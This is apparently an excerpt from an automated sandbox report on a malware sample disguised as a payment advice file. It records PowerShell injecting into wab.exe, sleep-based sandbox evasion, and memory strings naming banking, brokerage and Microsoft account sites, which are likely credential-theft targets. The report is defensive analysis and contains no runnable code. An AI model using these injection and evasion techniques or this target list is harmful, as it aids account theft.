Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3772	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 1338	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 8509	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 344	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -599872s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4124	Thread sleep count: 1338 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4124	Thread sleep count: 8509 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -599764s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -597641s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -597516s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -597406s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -597297s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -597186s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -596859s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -596391s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -595844s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -595297s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -595064s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -594937s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -594828s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -594718s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -594609s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2260	Thread sleep time: -594500s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Payment_Advice.exe	Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405770
Source: C:\Users\user\Desktop\Payment_Advice.exe	Code function: 0_2_0040622B FindFirstFileW,FindClose,	0_2_0040622B
Source: C:\Users\user\Desktop\Payment_Advice.exe	Code function: 0_2_0040276E FindFirstFileW,	0_2_0040276E

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599872	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597516	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597186	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596391	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 595064	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594500	Jump to behavior

Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: wab.exe, 00000005.00000002.3285513156.0000000005E1C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000005.00000002.3285513156.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: wab.exe, 00000005.00000002.3285513156.0000000005E1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW+f
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: wab.exe, 00000005.00000002.3305157603.0000000022714000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: wab.exe, 00000005.00000002.3305157603.0000000022A33000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\Payment_Advice.exe	API call chain: ExitProcess graph end node			graph_0-3516
Source: C:\Users\user\Desktop\Payment_Advice.exe	API call chain: ExitProcess graph end node			graph_0-3515

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_04E577F9 LdrInitializeThunk,

2_2_04E577F9

Source: C:\Users\user\Desktop\Payment_Advice.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3B50000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 28BFE68			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
